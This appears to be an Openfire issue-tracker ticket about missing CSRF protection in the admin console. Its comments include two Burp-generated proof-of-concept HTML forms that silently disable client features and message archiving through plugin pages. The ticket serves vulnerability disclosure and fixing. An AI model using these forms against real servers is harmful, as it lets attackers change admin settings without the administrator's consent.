Admin Console Cross Site Request Forgery (CSRF) Vulnerability
Description
Originally, this ticket related to a CSRF vulnerability in the admin console reported by Sven Tantau (see Ignite Forum URL) which referenced the now defunct site [httx://1337day.com/exploits/21338]. This ticket has been updated with more recent info from hyp3rlinx.
Vulnerability Details:
No CSRF token exists within the Openfire Admin Console, which allows us to take malicious actions against the application from another form. Examples include:
Changing the admin password
Adding arbitrary users to the system
Editing server settings e.g. turning SSL off
Adding rogue malicious clients with permit access (e.g. allow all XMPP clients to connect)
and more...
Exploit Code(s) / Full Details:
https://packetstormsecurity.com/files/133554/Openfire-3.10.2-Cross-Site-Request-Forgery.html
Environment
Acceptance Test - Entry
Activity
Audit policy ignores the CSRF token, and works with out it.
Thus you can disable auditing by making the admin visit a URL like this.
Ah, Dave clarified for audit-policy the update fails, but the values shown are in the request.
Client Control also has CSRF on features.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/plugins/clientcontrol/client-features.jsp" method="POST">
<input type="hidden" name="accountsEnabled" value="false" />
<input type="hidden" name="addcontactsEnabled" value="false" />
<input type="hidden" name="addgroupsEnabled" value="false" />
<input type="hidden" name="advancedEnabled" value="false" />
<input type="hidden" name="avatarsEnabled" value="false" />
<input type="hidden" name="broadcastEnabled" value="false" />
<input type="hidden" name="removalsEnabled" value="false" />
<input type="hidden" name="renamesEnabled" value="false" />
<input type="hidden" name="transferEnabled" value="false" />
<input type="hidden" name="helpforumsEnabled" value="false" />
<input type="hidden" name="helpuserguideEnabled" value="false" />
<input type="hidden" name="historyEnabled" value="false" />
<input type="hidden" name="hostnameEnabled" value="false" />
<input type="hidden" name="invisibleloginEnabled" value="false" />
<input type="hidden" name="logoutexitEnabled" value="false" />
<input type="hidden" name="movecopyEnabled" value="false" />
<input type="hidden" name="passwordchangeEnabled" value="false" />
<input type="hidden" name="personsearchEnabled" value="false" />
<input type="hidden" name="pluginsEnabled" value="false" />
<input type="hidden" name="preferencesEnabled" value="false" />
<input type="hidden" name="presenceEnabled" value="false" />
<input type="hidden" name="vcardEnabled" value="false" />
<input type="hidden" name="savepassandautologinEnabled" value="false" />
<input type="hidden" name="updatesEnabled" value="false" />
<input type="hidden" name="viewnotesEnabled" value="false" />
<input type="hidden" name="viewtasklistEnabled" value="false" />
<input type="hidden" name="submit" value="Save Settings" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
/plugins/monitoring/archiving-settings.jsp has no CSRF
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="https://192.168.56.103:9091/plugins/monitoring/archiving-settings.jsp" method="POST">
<input type="hidden" name="roomArchiving" value="off" />
<input type="hidden" name="maxTime" value="0" />
<input type="hidden" name="messageArchiving" value="off" />
<input type="hidden" name="maxAge" value="1" />
<input type="hidden" name="cancel" value="Cancel" />
<input type="hidden" name="idleTime" value="0" />
<input type="hidden" name="metadataArchiving" value="off" />
<input type="hidden" name="maxRetrievable" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
/server-db-stats.jsp can be disabled by URL, this would be rather a lame hack. Or the collected stats cleared, also lame.
